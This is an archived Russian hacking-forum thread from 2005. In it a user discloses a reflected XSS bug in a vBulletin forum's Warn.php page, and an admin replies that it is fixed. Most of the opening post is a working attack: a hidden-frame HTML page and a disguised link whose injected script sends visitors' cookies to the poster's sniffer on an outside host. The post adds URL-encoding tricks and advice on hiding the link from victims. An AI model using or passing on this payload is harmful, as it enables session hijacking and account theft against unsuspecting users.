PDA

Просмотр полной версии : Уязвимость Форум.Античат.Ру (не критическая)


censored!
11.05.2005, 21:42
http://forum.antichat.ru/Warn.php пропускает вхождения

Пример: http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0"><script>alert(document.cookie);</script>

Чего делать?
Создавать фрейм-содержащую страницу, где левый невидимый фрейм будет иметь путь до снифера* (* - см.ниже), а центральный - типа липовый сайт. И давать ссылку на свой сайт.
Вот так выглядит index.html (в примере адрес снифера указан мой):

<html>
<head>
<title>Типа липовый сайт...</title>
</head>
<frameset cols="0,*" frameborder="NO" border="0" framespacing="0">
<frame name="leftFrame" scrolling="NO" noresize src="http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0%22%3E%3Cscript%3Edocument.body.background=%22 http://altsupport.h15.ru/cgi-bin/script.php?cook=%22%2Bdocument.cookie;%3C/script%3E">
<frame name="mainFrame" src="main_frame.html">
</frameset>
<noframes><body>Ты зачем фреймы отрубил, засранец??? :)</body></noframes>
</html>
...
*
Так как + (плюсик) вырезается, его заменяем: %2B
Чтобы все это впихнуть в путь левого фрейма, " (кавычка) и скобки тоже заменяем:
" - %22
> - %3C
> - %3E
...
Если лень возится с сайтом, то можно и тут просто ссылкой дать. Не каждый же смотрит на статусную строку? А если еще УРЛ и перекодировать, то даже если и смотрят - все-равно нажмут (то что ниже - не перекодировал).

Как пример:
...
!ВНИМАНИЕ! ПРИ НАЖАТИИ НА СЛЕДУЮЩУЮ ССЫЛКУ ВАШИ КУКИ УЙДУТ КО МНЕ НА СНИФЕР!
...
Всем добро пожаловать на сайт http://forum.antichat.ru (http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0%22%3E%3Cscript%3Edocument.body.background=%22 http://altsupport.h15.ru/cgi-bin/script.php?cook=%22%2Bdocument.cookie;%3C/script%3E)
...
© censored!

(-=util=-)
11.05.2005, 22:23
Нифига себе намутил . А бага то красивая :) Аффтар жжот!!!

Algol
11.05.2005, 22:25
Спасибо, исправлено.

m0nzt3r
12.05.2005, 16:53
Спасибо, исправлено.
хорошо что исправил а то я по этой ссылке перешел )))

Че Гевара
12.05.2005, 20:19
Молодец ... Даю грина )
Нифига себе намутил . А бага то красивая :) Аффтар жжот!!!
Да, но прокатит она только там, где устанвлен хак "Warning Control [Created By Zero Tolerance]" ...

censored!
14.05.2005, 02:09
Добавление (всегда пригодится):
url-конвертер брать тут: [* (http://www.uinc.ru/articles/09/URLConverter.exe)censored (http://forum.antichat.ru/member.php?u=2463)*] (http://www.uinc.ru/articles/09/URLConverter.exe)


Да, но прокатит она только там, где устанвлен хак "Warning Control [Created By Zero Tolerance]" ...
Встречается он не часто, но все-равно встречается.

Algol
14.05.2005, 02:41
Да, но прокатит она только там, где устанвлен хак "Warning Control [Created By Zero Tolerance]" ...
Кстати редкосная фигня....
Идея хорошая, а реализация - как всегда...

censored!
14.05.2005, 02:55
url-конвертер брать тут: [*censored*]
Видимая ссылка на другой ресурс? Оке. Понял. Буду маскировать.

Algol
14.05.2005, 10:56
Видимая ссылка на другой ресурс? Оке. Понял. Буду маскировать.
Просто такая же возможность есть в нашем родном InetCrack